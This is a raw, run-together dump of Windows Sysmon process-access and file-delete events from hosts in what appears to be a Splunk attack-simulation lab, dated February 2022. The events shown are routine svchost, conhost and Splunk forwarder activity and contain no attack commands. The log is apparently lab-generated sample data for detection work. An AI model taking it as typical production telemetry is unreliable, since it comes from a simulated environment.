11:15:47.907{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.907{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.906{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.905{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.905{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.905{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.905{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.905{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.905{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.905{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.905{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.905{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:47.827{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A87A814247FC1201656B1E35A67FDA55,SHA256=BBB90A9C507D33C8432534676AD9D3786C91483D249664984295BAC5A181471D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221222Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.940{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22BEAB3D22B736073FA923E3F868EEBA,SHA256=BAD0548D6F9ECCE8DA882B9BB1371EC7E546A09B03608C03C856F279A92D3393,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221221Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.830{4F8D34B0-1763-6216-0B05-000000003902}4323516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221220Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.533{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1763-6216-0B05-000000003902}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221219Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.533{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221218Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.533{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221217Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.533{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221216Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:47.533{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221215Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 